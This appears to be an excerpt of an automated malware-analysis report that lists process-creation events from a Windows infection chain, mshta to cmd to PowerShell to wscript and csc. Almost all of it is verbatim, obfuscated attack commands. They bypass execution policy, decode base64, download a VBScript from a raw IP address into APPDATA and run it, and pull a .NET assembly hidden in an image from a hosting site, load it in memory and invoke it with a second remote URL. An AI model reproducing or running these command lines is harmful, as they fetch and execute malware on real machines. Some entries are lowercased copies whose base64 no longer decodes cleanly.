Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicecreamychickenfvouratedishesforeveryonewho.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES254C.tmp" "c:\Users\user\AppData\Local\Temp\otto1awr\CSCDFB69145189A40B197F122BC8548BE9C.TMP"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $midroll = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHRlcnJpZnlpbmduZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGRvbG91cnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtZWNvcHRlcmFucyA9ICRkb2xvdXJzLkRvd25sb2FkRGF0YSgkdGVycmlmeWluZ25lc3MpOyRub3NleSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRtZWNvcHRlcmFucyk7JG1pY3JvZmljaGUgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JHNlbGVjdGl2ZWx5ID0gJzw8QkFTRTY0X0VORD4+JzskaXNvZXVnZW5vbCA9ICRub3NleS5JbmRleE9mKCRtaWNyb2ZpY2hlKTskd3JlYWtzID0gJG5vc2V5LkluZGV4T2YoJHNlbGVjdGl2ZWx5KTskaXNvZXVnZW5vbCAtZ2UgMCAtYW5kICR3cmVha3MgLWd0ICRpc29ldWdlbm9sOyRpc29ldWdlbm9sICs9ICRtaWNyb2ZpY2hlLkxlbmd0aDskcG9zdGVyaXNlZCA9ICR3cmVha3MgLSAkaXNvZXVnZW5vbDskZW52aWUgPSAkbm9zZXkuU3Vic3RyaW5nKCRpc29ldWdlbm9sLCAkcG9zdGVyaXNlZCk7JGhlcm1zID0gLWpvaW4gKCRlbnZpZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkZW52aWUuTGVuZ3RoKV07JGFtYmlnZW5hbCA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhlcm1zKTskc3RlcmlsaXR5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkYW1iaWdlbmFsKTskdm9ldGdhbmdlciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR2b2V0Z2FuZ2VyLkludm9rZSgkbnVsbCwgQCgnMC9rZTQ0MC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnYWRkb29tJywgJ2FkZG9vbScsICdhZGRvb20nLCAnQWRkSW5Qcm9jZXNzMzInLCAnYWRkb29tJywgJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJ2FkZG9vbScsJzEnLCdhZGRvb20nKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07';$Angel = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($midroll));Invoke-Expression $Angel

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $midroll = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jhrlcnjpznlpbmduzxnzid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgrvbg91cnmgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrtzwnvchrlcmfucya9icrkb2xvdxjzlkrvd25sb2fkrgf0ysgkdgvycmlmewluz25lc3mpoyrub3nlesa9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkcrtzwnvchrlcmfucyk7jg1py3jvzmljagugpsanpdxcqvnfnjrfu1rbulq+pic7jhnlbgvjdgl2zwx5id0gjzw8qkftrty0x0vord4+jzskaxnvzxvnzw5vbca9icrub3nles5jbmrlee9mkcrtawnyb2zpy2hlktskd3jlywtzid0gjg5vc2v5lkluzgv4t2yojhnlbgvjdgl2zwx5ktskaxnvzxvnzw5vbcatz2ugmcatyw5kicr3cmvha3mglwd0icrpc29ldwdlbm9soyrpc29ldwdlbm9sics9icrtawnyb2zpy2hllkxlbmd0adskcg9zdgvyaxnlzca9icr3cmvha3mglsakaxnvzxvnzw5vbdskzw52awugpsakbm9zzxkuu3vic3ryaw5nkcrpc29ldwdlbm9slcakcg9zdgvyaxnlzck7jghlcm1zid0glwpvaw4gkcrlbnzpzs5ub0noyxjbcnjhesgpihwgrm9yrwfjac1pymply3qgeyakxyb9kvstms4ulsgkzw52awuutgvuz3rokv07jgftymlnzw5hbca9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcojghlcm1zktskc3rlcmlsaxr5id0gw1n5c3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzcgkyw1iawdlbmfsktskdm9ldgdhbmdlcia9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyr2b2v0z2fuz2vylkludm9rzsgkbnvsbcwgqcgnmc9rztq0mc9yl2vllmv0c2fwly86c3b0dggnlcanywrkb29tjywgj2fkzg9vbscsicdhzgrvb20nlcanqwrksw5qcm9jzxnzmzinlcanywrkb29tjywgj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsj2fkzg9vbscsjzenlcdhzgrvb20nksk7awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07';$angel = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($midroll));invoke-expression $angel
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jdzmogwgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbbrgqtdflqzsagicagicagicagicagicagicagicagicagicagicagicatbwvtykvsrgvgsw5pdglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjstu9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagt3nov2vtdixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagvwvrevnwr3btsixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagq2jku3pct3asdwludcagicagicagicagicagicagicagicagicagicagicagicbswmzps2trbmfkcixjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrmy2pmktsnicagicagicagicagicagicagicagicagicagicagicagic1oyw1licagicagicagicagicagicagicagicagicagicagicagicjyb0uiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lu3bhq2ugicagicagicagicagicagicagicagicagicagicagicagduxxahlmqusgicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaknkw4bdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzizljk1ljizns4yos84mdgvdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdob2lub25saw5ld2l0ac50suyilcikru52okfquerbvefcdmvyew5py2vjcmvhbxljaglja2vuznzvdxjhdgvkaxnozxnmb3jldmvyew9uzxdoby52ylmildasmck7u1rhulqtu0xlzxaomyk7au52b2tllwv4chjfc1npb24gicagicagicagicagicagicagicagicagicagicagicagiirlbny6qvbqrefuqvx2zxj5bmljzwnyzwftewnoawnrzw5mdm91cmf0zwrpc2hlc2zvcmv2zxj5b25ld2hvlnziuyi='+[char]34+'))')))"
